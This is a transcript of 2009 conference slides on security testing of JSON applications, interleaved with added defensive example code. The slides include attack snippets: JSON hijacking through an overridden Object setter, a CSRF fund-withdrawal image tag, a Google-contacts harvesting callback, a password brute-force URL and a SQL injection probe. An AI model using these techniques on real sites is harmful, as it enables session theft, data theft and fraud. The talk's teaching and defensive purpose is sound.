testing json applications for security holes.pptsecuritybyte.org/2009/schedule/day2_tulip_i/testing...
TRANSCRIPT
Testing JSON Applications for Security Holes
Securitybyte & OWASP Confidential
Aviram Jenik
CEO
Beyond Security
Who am I?
• CEO of Beyond Security:
  – We develop automated security testing tools:
    • Network vulnerability assessment/management
    • Automated Web Site Security Scans
    • Blackbox testing/fuzzing
  – We operate and maintain SecuriTeam.com
    • One of the largest vulnerability databases on the net
    • Publish vulnerability information and exploit code
    • Open and free
  – SecuriTeam Secure Disclosure
    • Paying researchers who find 0-day vulnerabilities
    • Giving customers early access to this information
Securitybyte & OWASP AppSec Conference 2009
So what do I do?
• I've been doing security for 23 years
• Focusing on vulnerability research/security testing
Attacking vs. securing
• I'm going to concentrate on the attacks
• You should figure out how to secure
“If you know the enemy and know yourself you need not fear the results of a hundred battles.” - Sun Tzu, The Art of War
What is JSON?
If you don't know what JSON is, go hear SID talk about Oracle attacks or John speak about critical infrastructure
What is JSON?
• A way to transfer data in a structured format – alternative to XML
• Popular in interactive AJAX programs
  – Used by Yahoo and Google
Problem #1: Cross domain reference
JSON script can be called across domains: a page on any origin can include a JSON URL with <script src="...">, and the browser fetches it with the victim's cookies for that site attached. The same-origin policy stops the foreign page from reading the response through XMLHttpRequest, but not from executing it as a script.
JSON code sample
var object;
var json = new XMLHttpRequest();
json.open("GET", "/object.json", true);
json.onreadystatechange = function () {
  if (json.readyState == 4) {
    var res = json.responseText;
    // the whole response body is handed to eval (see Problem #2)
    object = eval("(" + res + ")");
  }
};
json.send(null);
HTTP Request
GET /object.json HTTP/1.1
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR
HTTP Response
HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-8

[{"name":"Bill Gates", "exp":"11/19", "cardnum":"46358472617283", "amount":10000.00, "cvv":"876" },
 {"name":"Steve Jobs", "exp":"12/09", "cardnum":"550023847262637", "amount":99.99, "cvv":"123" }]
Problem
The browser attaches cookies according to the domain the request goes to (where the JSON endpoint lives), not according to the page that triggered the request. A request for the bank's JSON issued from an attacker's page therefore carries the victim's bank session.
<img src="http://bank/withdraw?account=victim&amount=1000000&for=evilhacker">
Attack example
<script>
// Overrides the global Object constructor so that every object literal the
// JSON response builds routes its "email" value to captureObject. The
// "setter =" syntax is the legacy SpiderMonkey form used by the Firefox of
// the time; the modern equivalent is Object.defineProperty.
function Object() {
  this.email setter = captureObject;
}
// Send the captured object back to the attacker's Web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  // the request carrying objString to the attacker's site follows here (cut off on the slide)
}
</script>
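The server- and client-side checks that defeat the cross-domain read in the attack above, as an added example (not code from the talk or from Beyond Security). The ")]}'," prefix is of the kind Google services and AngularJS used; the POST plus X-Requested-With policy, the function names and the sample records are this example's own assumptions.

```javascript
'use strict';
// Added example, not from the talk: checks against the cross-domain JSON
// read shown above. Function names, the request policy and the sample
// records are this example's own assumptions.

// An unparseable prefix of the kind Google services and AngularJS used. A
// same-origin XHR client strips it before parsing; a cross-origin
// <script src> include hits a syntax error before any value is built.
const ANTI_HIJACK_PREFIX = ")]}',\n";

function wrapJsonResponse(data) {
  return ANTI_HIJACK_PREFIX + JSON.stringify(data);
}

function readJsonResponse(text) {
  if (!text.startsWith(ANTI_HIJACK_PREFIX)) {
    throw new Error('response lacks the anti-hijack prefix');
  }
  return JSON.parse(text.slice(ANTI_HIJACK_PREFIX.length));
}

// What a <script src="/object.json"> include on the attacker's page would
// do with a response body: compile it as a script. new Function only
// parses here, so nothing is executed; the result says whether it could be.
function scriptIncludeOutcome(body) {
  try {
    new Function(body);
    return 'parses';
  } catch (e) {
    return e.constructor.name; // 'SyntaxError' when the body is not a script
  }
}

// Request policy for a cookie-authenticated JSON endpoint. A cross-origin
// <script> tag can only issue a GET and cannot add custom headers, so
// requiring POST plus X-Requested-With leaves same-origin XHR as the only
// caller. Header names are assumed lower-cased, as Node's http module does.
function isAcceptableJsonRequest(method, headers, allowedOrigin) {
  if (method !== 'POST') return false;
  if (headers['x-requested-with'] !== 'XMLHttpRequest') return false;
  const origin = headers.origin;
  if (origin !== undefined && origin !== allowedOrigin) return false;
  return true;
}

// Constructed stand-in for the card records on the response slide.
const SAMPLE_RECORDS = [
  { name: 'A. Customer', exp: '11/19', cardnum: '4111111111111111', amount: 10000.0, cvv: '000' },
  { name: 'B. Customer', exp: '12/09', cardnum: '5500000000000004', amount: 99.99, cvv: '000' },
];

// Three response bodies and what a foreign script include makes of each:
// the bare array (the slide's response) is a valid script; wrapping it in
// an object, as ASP.NET's {"d": ...} does, is not (a leading brace opens a
// block and the quoted key is not a label); the prefixed body is not either.
function compareBodies() {
  return {
    bareArray: scriptIncludeOutcome(JSON.stringify(SAMPLE_RECORDS)),
    objectWrapped: scriptIncludeOutcome(JSON.stringify({ d: SAMPLE_RECORDS })),
    prefixed: scriptIncludeOutcome(wrapJsonResponse(SAMPLE_RECORDS)),
  };
}
```

Under Node, compareBodies() reports 'parses' for the bare array, meaning a foreign script include would have built it inside the attacker's page, and 'SyntaxError' for both the object wrapper and the prefixed body. The header check and the prefix address different stages of the attack (issuing the request versus using the response) and are best applied together.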
Google CSRF Vulnerability
<script type="text/javascript">
// Callback invoked by the Google contacts script include with the victim's
// contact list; the <script src> include itself is not shown on the slide.
function google(data) {
  var emails = "", i;
  for (i = 0; i < data.Body.Contacts.length; i++) {
    emails += "<li>" + data.Body.Contacts[i].Email + "</li>";
  }
  document.write("<ol>" + emails + "</ol>");
}
</script>
OT: Google vulnerability ACK procedure
1. Deny
2. Downplay
3. Fix silently
4. Ignore
We have reported a DoS attack to Google that is still in step 1
Pre-condition for attack
1. Ask victim to visit my page
2. Victim must be “logged in” to a Google service
Nice twist
Brute force Gmail password (unauthenticated sessions):
<img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1
Problem #2: eval
• JSON is read via an “eval” command: var p = eval("(" + contact + ")");
• eval runs the whole response as a script, so if we place JavaScript code in “contact” we can cause the browser to execute our code under the trusted domain
  – Steal cookies
  – Cookie = session = login
  – Change page text
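The two readers side by side, as an added example that is not from the talk: the eval() reader from the slide, JSON.parse, and a pre-check of the kind Douglas Crockford's json2.js applied before handing text to eval (the regular expressions are adapted from it). The contact payloads and the function names are this example's own constructions.

```javascript
'use strict';
// Added example, not from the talk: the eval() reader from the slide beside
// a reader that accepts only data, plus a "is this really JSON" pre-check
// adapted from json2.js. The payloads below are constructed.

// The slide's reader: whatever the response contains is executed.
function readWithEval(text) {
  return eval('(' + text + ')');
}

// Hardened reader: JSON.parse builds data and throws on anything else.
function readWithJsonParse(text) {
  return JSON.parse(text);
}

// Pre-check: blank out escapes, strings, numbers and literals, collapse
// array openers, and require that only JSON punctuation remains.
function looksLikeJson(text) {
  const residue = text
    .replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
    .replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
    .replace(/(?:^|:|,)(?:\s*\[)+/g, '');
  return /^[\],:{}\s]*$/.test(residue);
}

// Runs both readers on one body and reports what happened; the eval side
// records whether the payload managed to set a global in the page.
function compareReaders(text) {
  delete globalThis.pwned;
  const report = { evalRan: false, evalSetGlobal: false, parseError: null, passesPrecheck: looksLikeJson(text) };
  try {
    readWithEval(text);
    report.evalRan = true;
  } catch (e) {
    report.evalError = e.constructor.name;
  }
  report.evalSetGlobal = globalThis.pwned === true;
  delete globalThis.pwned;
  try {
    readWithJsonParse(text);
  } catch (e) {
    report.parseError = e.constructor.name;
  }
  return report;
}

// Constructed: a "contact" that is really a script, standing in for data an
// attacker managed to get into the JSON response, and an honest one.
const MALICIOUS_CONTACT = '(function () { globalThis.pwned = true; return {"email": "x"}; })()';
const HONEST_CONTACT = '{"name": "Bill Gates", "email": "bill@example.test", "amount": 10000.00}';
```

compareReaders(MALICIOUS_CONTACT) shows eval executing the payload and setting the global, while JSON.parse throws SyntaxError and the pre-check refuses the text; the honest contact passes all three. The pre-check only matters for code that still has to call eval; where JSON.parse is available it is the whole fix.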
Problem #3: Function overloading
function Array() {
  this[1] = 50;
}
var a = [40];
alert(a[0] + a[1]); // Gives 90
The same trick applied to Object is what the setter attack above relies on. The result depends on the engine: the 90 above is what browsers of the time produced, because an array literal called whatever Array was bound to; current engines build literals with the built-in constructor, so this override no longer fires.
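Which of these overrides still see JSON data in a current engine, as an added example that is not from the talk; it is the check to run before relying on either trick in a test today. The Array override is the slide's, scoped to a function; the setter is the Object setter from the Attack example slide written with Object.defineProperty. The values are constructed and the environment assumed is Node.

```javascript
'use strict';
// Added example, not from the talk: which of the overrides on these slides
// still intercept JSON data in a current engine (run under Node). Values
// are constructed.

// Problem #3 as written, with the override scoped to this function.
function arrayLiteralWithOverriddenArray() {
  function Array() { this[1] = 50; }
  const a = [40];                               // literal built by the built-in constructor
  return { second: a[1], sum: a[0] + a[1] };    // today: undefined and NaN, not 50 and 90
}

// The setter attack: an "email" setter on Object.prototype, then four ways
// of producing an object that carries an email field. The returned list is
// what the attacker's setter actually received.
function setterOnObjectPrototype() {
  const captured = [];
  Object.defineProperty(Object.prototype, 'email', {
    set(v) { captured.push(v); },
    configurable: true,
  });
  try {
    // JSON.parse and object literals define own data properties directly;
    // the inherited setter is never consulted.
    const parsed = JSON.parse('{"email":"parsed@example.test"}');
    const literal = { email: 'literal@example.test' };
    // Plain assignment and Object.assign go through [[Set]], which finds
    // the setter on the prototype chain and hands it the value.
    const assigned = {};
    assigned.email = 'assigned@example.test';
    const copied = Object.assign({}, JSON.parse('{"email":"copied@example.test"}'));
    const own = (o) => Object.prototype.hasOwnProperty.call(o, 'email');
    return {
      captured,
      ownField: { parsed: own(parsed), literal: own(literal), assigned: own(assigned), copied: own(copied) },
    };
  } finally {
    delete Object.prototype.email;              // leave the environment as found
  }
}
```

setterOnObjectPrototype() returns captured = ['assigned@example.test', 'copied@example.test']: the parsed and literal objects keep their own email field and the setter never sees it, while code that copies parsed data into another object with assignment or Object.assign still feeds the setter. That is the residue of this attack class worth keeping in mind when reviewing client code that merges JSON into shared objects.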
Problem #4: Code and data are mixed
• Hash/list is basically JavaScript
• Replace an existing hash value with script
• Wait for the value to be used => pwned
Problem #5
• JSON is structured data
• Tempting to directly read/write to db
• SQL Injection may be possible
SQL Injection via JSON
POST http://www.example.com/itemcheck.ashx HTTP/1.1
[...]
X-JSON-RPC: getItem
[...]

{"id":1,"method":"getItem","params":{ "id" : "--"}}
*Example taken from Blueinfy. See web2fuzz.pdf for more info
SQL Injection via JSON
HTTP/1.1 200 OK
[…]
{"id":1,"error":{"name":"JSONRPCError","message":"Incorrect syntax near '='.","errors":[{"name":"SqlException","message":"Incorrect syntax near '='."}]}}
Variation: fuzzing JSON data
• Client trust problem: the server assumes the JSON it receives is well-formed and correctly typed because its own client produced it
Fuzzing examples:
• Non-array where an array is expected
• Large/negative numbers
• Symbols like @'”%? --
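The getItem call from the Blueinfy slides handled two ways, with the fuzz cases above run through a parameter validator, as an added example (not from the talk or from Blueinfy's web2fuzz material). The request shape follows the slides; the SQL text, the table and column names, the function names and every request body are this example's own constructed assumptions.

```javascript
'use strict';
// Added example, not from the talk or from Blueinfy: the getItem JSON-RPC
// call handled unsafely and safely, plus the fuzz cases from the slide run
// through a parameter validator. SQL text, table and column names and all
// request bodies are assumed/constructed.

// What the error on the slide points to: the id pasted into the SQL text.
// With id "--" the rest of the statement becomes a comment and the server
// reports "Incorrect syntax near '='".
function buildGetItemUnsafe(params) {
  return 'SELECT name, price FROM items WHERE id = ' + params.id;
}

// Parameterised form: the value travels separately from the SQL text.
function buildGetItemSafe(params) {
  return { sql: 'SELECT name, price FROM items WHERE id = ?', args: [params.id] };
}

// Schema check before any query: params must be an object and id a
// positive integer in the safe range. Strings, arrays, negatives and
// out-of-range numbers are all refused, whatever the client sent.
function validateGetItemParams(params) {
  if (params === null || typeof params !== 'object' || Array.isArray(params)) {
    return { ok: false, reason: 'params must be an object' };
  }
  const id = params.id;
  if (typeof id !== 'number' || !Number.isSafeInteger(id) || id < 1) {
    return { ok: false, reason: 'id must be a positive integer' };
  }
  return { ok: true, value: { id } };
}

// Full handler: parse, validate, build. Returns the query or an error.
function handleGetItem(body) {
  let request;
  try {
    request = JSON.parse(body);
  } catch (e) {
    return { error: 'malformed JSON' };
  }
  if (request === null || typeof request !== 'object') return { error: 'request must be an object' };
  if (request.method !== 'getItem') return { error: 'unknown method' };
  const check = validateGetItemParams(request.params);
  if (!check.ok) return { error: check.reason };
  return buildGetItemSafe(check.value);
}

// The slide's probe plus the fuzz cases it lists, as request bodies.
const FUZZ_BODIES = [
  '{"id":1,"method":"getItem","params":{ "id" : "--"}}',          // the slide's probe
  '{"id":1,"method":"getItem","params":[1]}',                     // array where an object is expected
  '{"id":1,"method":"getItem","params":{"id":[1]}}',              // array where a scalar is expected
  '{"id":1,"method":"getItem","params":{"id":-1}}',               // negative number
  '{"id":1,"method":"getItem","params":{"id":1e308}}',            // huge number
  '{"id":1,"method":"getItem","params":{"id":"@\'\\"%?"}}',      // symbols
  '{"id":1,"method":"getItem","params":{"id":"1 OR 1=1"}}',       // classic injection as a string
  '{"id":1,"method":"getItem","params":{"id":1',                  // truncated body
];

// Returns the bodies the handler let through to a query.
function fuzzHandler(bodies) {
  return bodies.filter((body) => handleGetItem(body).sql !== undefined);
}
```

fuzzHandler(FUZZ_BODIES) returns an empty list: every case is stopped at the validator or the parser, and a well-formed body such as {"id":1,"method":"getItem","params":{"id":42}} reaches the parameterised query with 42 in args. Parameterisation alone would already defeat the "--" probe; the validator is what turns the remaining fuzz cases into clean errors instead of exceptions like the SqlException on the slide.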
Can of worms
More problems which were not discussed:
• Spoofing the referrer
• Reading server headers
JSONP
• JSONP (JSON w/ padding) by definition allows reading scripts from another site: the data is wrapped in a call to a callback named by the requester precisely so that it can be loaded with <script src> from any origin, and attacks on it are trivial: an attacker's page names its own callback and receives the victim's data, cookies attached, exactly as in the google(data) example above
Thank you!
www.beyondsecurity.com